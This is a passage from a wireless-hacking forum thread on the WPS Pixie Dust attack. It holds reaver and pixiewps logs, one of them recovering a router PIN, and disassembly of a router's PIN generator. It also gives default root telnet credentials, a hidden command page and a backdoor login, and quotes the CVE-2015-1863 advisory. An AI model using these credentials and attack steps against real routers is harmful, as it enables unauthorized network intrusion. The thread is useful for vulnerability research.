[P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
[P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Code:Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
AND This AP VULNERABLE , pixi sees true values
http://imgur.com/zlmrfjOCode:Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................
e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
[P] AuthKey:
[+] Sending M2 message
[P] E-Hash1:
[P] E-Hash2:
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust] [+] WPS pin: 71632285
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
I think this is problem so Pixie not vulnerable , Realtek ,brodcom and atheros chipsets ....
I don t know but probably
hello
Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )
pixiewps ( you have another thread to speak about it ) does not "see" any value,Quote:
"Pixie sees wrong values."
Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
cheers
When it's ready. I was told very soon. Kept checking back here. Or u could follow the github
I can beta also
Hi,
Got the Firmware, unpacked with fmk, checked with idapro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but i'm not as good in mips, the (in my opinion) important parts are marked, maybe someone, who's familiarized with mips can tell something about.
Code:LOAD:0040C4C4 la $t9, gettimeofday
LOAD:0040C4C8 move $a1, $zero
LOAD:0040C4CC jalr $t9 ; gettimeofday
LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68
LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp)
LOAD:0040C4DC la $t9, srand
LOAD:0040C4E0 nop
LOAD:0040C4E4 jalr $t9 ; srand
LOAD:0040C4E8 nop
LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0 nop
LOAD:0040C4F4 la $t9, rand
LOAD:0040C4F8 nop
LOAD:0040C4FC jalr $t9 ; rand
LOAD:0040C500 nop
LOAD:0040C504 li $v1, 0x6B5FCA6B
LOAD:0040C50C mult $v0, $v1
LOAD:0040C510 sra $a0, $v0, 31
LOAD:0040C514 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C518 nop
LOAD:0040C51C la $t9, 0x400000
LOAD:0040C520 nop
LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000)
LOAD:0040C528 mfhi $v1
LOAD:0040C52C sra $v1, 22
LOAD:0040C530 subu $a1, $v1, $a0
LOAD:0040C534 sll $a0, $a1, 5
LOAD:0040C538 subu $a0, $a1
LOAD:0040C53C sll $v1, $a0, 6
LOAD:0040C540 subu $v1, $a0
LOAD:0040C544 sll $v1, 3
LOAD:0040C548 addu $v1, $a1
LOAD:0040C54C sll $a0, $v1, 2
LOAD:0040C550 addu $v1, $a0
LOAD:0040C554 sll $v1, 7
LOAD:0040C558 subu $a1, $v0, $v1
LOAD:0040C55C sll $s0, $a1, 2
LOAD:0040C560 move $a0, $a1
LOAD:0040C564 jalr $t9 ; sub_404128
LOAD:0040C568 addu $s0, $a1
LOAD:0040C56C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C570 sll $s0, 1
LOAD:0040C574 addu $a0, $s0, $v0
LOAD:0040C578 la $t9, 0x400000
LOAD:0040C57C nop
LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000)
LOAD:0040C584 jalr $t9 ; sub_403F60
LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C58C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C594 la $a0, 0x440000
LOAD:0040C598 la $t9, printf
LOAD:0040C59C nop
LOAD:0040C5A0 jalr $t9 ; printf
LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n"
LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC li $a0, 0xADAC
LOAD:0040C5B0 addu $a0, $s2, $a0
LOAD:0040C5B4 la $t9, strcpy
LOAD:0040C5B8 b loc_40C8C0
LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0
WoW
Thank you SO MUCH someone else ( i mean you, not someone else )
It is much more "readable" than what i got. ;)
i am not used to MIPs neither (my poor skills in dissembling speak for-themselves :P )
i wil try to with the tool you used, i am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underline is definitely like a simple "printf" that's "stdout" the value of the PIN
SO GREAT! ;)
first, thanks to you, we know 100% sure that building time is the string used with some randomization.
the startup.sh script was giving a strong clue : time was "generated" just before the PIN....
Another clue : we already know that time is used as a seed for the diffie Hellman key exchange.
Now we know : time is definitely and surely used to generate the default PIN
And it is the first build time.
That's kind of an issue if we look in a way to generate the exact default PIN. . depending of the randomization, but it looks like this with the devices i saw; we might be able to guess the firsts digit correctly realtioning with the year of production,,,, then the PIN respects the checksum so the seconds start on 7 digits
One hour is 3600 seconds and we would need to have maximum about 15 minutes more or less from exact building time to get the first half of PIN... sorry for my english, but i guess you see what i mean...
but a little pixie flying around told me that this kind of "unsuported realteck" would, maybe, who knows?, not be unsupported anymore for so long....
thanks so much for the information and it is helping a lot................. ;)
DOH! How did i forget about fmk, but last i used it was when i was taking part in "jailbreaking" the neotv 300b. Looks like i got some playing to do :-D
Hello kcdtv,
I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code :rolleyes: ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device
With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:
// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"
// generate a "random" WPS pin
# flash -gen-pin
// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444
// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014
// change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111
About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.
Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.
Congrats everyone for your efforts
WoW && WoW
Like someone else you are amazing too :D
Thta's actualy one of the most exiting thread , full of amazing people, you guys rules! :cool:
YES!Quote:
- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even-thought there is no way to enable / or disable it / or configure it (from the web interface with the proposed option)
But I couldn't log in.
Now i can :cool: thank you SO MUCH that's awsome
By the way, did you noticed this permanent "super" backdoor?
With credentials super:super you can log with administrator privileges. (but not in telnet)
http://pix.toile-libre.org/upload/or...1430310175.jpg
i get a 404 error when i try to acess this web page or if i try to execute a command through POST request (but i am not use at all to this so maybe i do something wrong)Quote:
i also use version v3.2.0.2.6 different then your. I should make a downgade to check al this very interesting and fundamentals elements that you bring to us.
Thanks for showing us and explaining us all this system around PIN managment (and so much more, this are tremendous informations )
@ kcdv
i'm glad, that i could help :o and i'm with you: great thread !
And a little update :
VULNERABLE:
Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052
Code:[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
[P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70:dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:47:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45:80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7:8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90:4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07:9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5:c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54:bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b9:4f:04:41:98:82:25:2a:0a
[P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0:5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:48:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98:d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e:ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:71:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff:64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27:a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4:ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22:89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d9:75:0a:db:c9:f9:43:ba:83
[P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f:4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
[P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6:48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
[P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe:39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41
@kcdtv pointed out a newly documented "flaw" I guess i would call it: http://w1.fi/security/2015-1/wpa_sup...d-overflow.txt
It was something was I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for theses purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.
If you don't want to click the link, it is just a text document:
That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.Code:wpa_supplicant P2P SSID processing vulnerability
Published: April 22, 2015
Identifier: CVE-2015-1863
Latest version available from: http://w1.fi/security/2015-1/
Vulnerability
A vulnerability was found in how wpa_supplicant uses SSID information
parsed from management frames that create or update P2P peer entries
(e.g., Probe Response frame or number of P2P Public Action frames). SSID
field has valid length range of 0-32 octets. However, it is transmitted
in an element that has a 8-bit length field and potential maximum
payload length of 255 octets. wpa_supplicant was not sufficiently
verifying the payload length on one of the code paths using the SSID
received from a peer device.
This can result in copying arbitrary data from an attacker to a fixed
length buffer of 32 bytes (i.e., a possible overflow of up to 223
bytes). The SSID buffer is within struct p2p_device that is allocated
from heap. The overflow can override couple of variables in the struct,
including a pointer that gets freed. In addition about 150 bytes (the
exact length depending on architecture) can be written beyond the end of
the heap allocation.
This could result in corrupted state in heap, unexpected program
behavior due to corrupted P2P peer device information, denial of service
due to wpa_supplicant process crash, exposure of memory contents during
GO Negotiation, and potentially arbitrary code execution.
Vulnerable versions/configurations
wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled
Attacker (or a system controlled by the attacker) needs to be within
radio range of the vulnerable system to send a suitably constructed
management frame that triggers a P2P peer device information to be
created or updated.
The vulnerability is easiest to exploit while the device has started an
active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control
interface command in progress). However, it may be possible, though
significantly more difficult, to trigger this even without any active
P2P operation in progress.
Acknowledgments
Thanks to Google security team for reporting this issue and smart
hardware research group of Alibaba security team for discovering it.
Possible mitigation steps
- Merge the following commits to wpa_supplicant and rebuild it:
P2P: Validate SSID element length before copying it (CVE-2015-1863)
This patch is available from http://w1.fi/security/2015-1/
- Update to wpa_supplicant v2.5 or newer, once available
- Disable P2P (control interface command "P2P_SET disabled 1" or
"p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant
configuration file)
- Disable P2P from the build (remove CONFIG_P2P=y)
Anyways, I guess SSID information comes from Management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials...le.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted form wi-fi planet) making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process :D
If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs...apter_0100.pdf
Let me know what you think about this!
Where can i get a copy of this firmware everyone is picking apart right now? I've tried to find some arris firmwares(as some seem to be invulerable to pixie) but they are apparently very tightly guarded and i do not own one or i would dump it myself. Definently no downloads for them, but if i get my hands on one physically... different story :-D
email username @ gmail